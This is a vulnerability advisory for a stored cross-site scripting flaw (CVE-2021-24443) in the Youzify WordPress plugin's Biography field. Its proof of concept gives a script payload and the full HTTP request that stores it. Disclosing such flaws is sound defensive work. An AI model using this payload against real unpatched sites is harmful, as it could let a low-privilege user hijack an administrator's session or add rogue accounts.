WordPress Plugin Vulnerabilities

Youzify < 1.0.7 - Stored Cross-Site Scripting via Biography

Description

The About Me widget of the plugin does not properly sanitise its Biography field, allowing any authenticated user to set Cross-Site Scripting payloads in it, which will be executed when viewing the affected user profile. This could allow a low privilege user to gain unauthorised access to the admin side of the blog by targeting an admin, inducing them to view their profile with a malicious payload adding a rogue account for example.

Proof of Concept

Log on as any user, go to the 'About me' widget section of your profile (https://example.com/members/<you username>/widgets/about_me/) and set the following payload in the Biography field: <script>alert(/XSS/)</script>

Then view the profile (either as yourself or any other user) to trigger the XSS (https://example.com/members/<username>/)

POST /members/user1/widgets/about_me/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------330784649142342642204053017225
Content-Length: 1288
Connection: close
Cookie: [your user cookies]
Upgrade-Insecure-Requests: 1


-----------------------------330784649142342642204053017225
Content-Disposition: form-data; name="upload_youzify_wg_about_me_photo"; filename=""
Content-Type: application/octet-stream


-----------------------------330784649142342642204053017225
Content-Disposition: form-data; name="youzify_options[youzify_wg_about_me_photo]"


-----------------------------330784649142342642204053017225
Content-Disposition: form-data; name="youzify_options[youzify_wg_about_me_title]"

User1

-----------------------------330784649142342642204053017225
Content-Disposition: form-data; name="youzify_options[youzify_wg_about_me_desc]"


-----------------------------330784649142342642204053017225
Content-Disposition: form-data; name="youzify_options[youzify_wg_about_me_bio]"

XSS here <script>alert(/XSS/)</script>

-----------------------------330784649142342642204053017225
Content-Disposition: form-data; name="action"

youzify_profile_settings_save_data

-----------------------------330784649142342642204053017225
Content-Disposition: form-data; name="security"

318e0fbc53

-----------------------------330784649142342642204053017225
Content-Disposition: form-data; name="save"


-----------------------------330784649142342642204053017225--

Affects Plugins

Plugin icon
youzify
Fixed in 1.0.7

References

CVE
CVE-2021-24443

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
8.9 (high)

Miscellaneous

Original Researcher
Phu Tran from techlabcorp.com
Submitter
Phu Tran
Submitter website
https://fergustran1008.medium.com
Submitter twitter
fergustr4n
Verified
Yes
WPVDB ID
a4432acd-df49-4a4f-8184-b55cdd5d4d34

Timeline

Publicly Published
2021-06-28 (about 2 years ago)
Added
2021-06-28 (about 2 years ago)
Last Updated
2022-01-02 (about 2 years ago)

Other

Published
Title
Published
2022-11-02
Title
Font Awesome 4 Menus <= 4.7.0 - Admin+ Stored XSS
Published
2021-09-10
Title
Appointment Hour Booking – WordPress Booking Plugin < 1.3.17 - Authenticated Stored XSS
Published
2023-10-18
Title
Mendeley <= 1.3.4 - Admin+ Stored XSS
Published
2024-04-10
Title
Top Bar < 3.0.4 - Authenticated (Admin+) Stored Cross-Site Scripting
Published
2023-06-19
Title
Smoothscroller <= 1.0.0 - Admin+ Stored XSS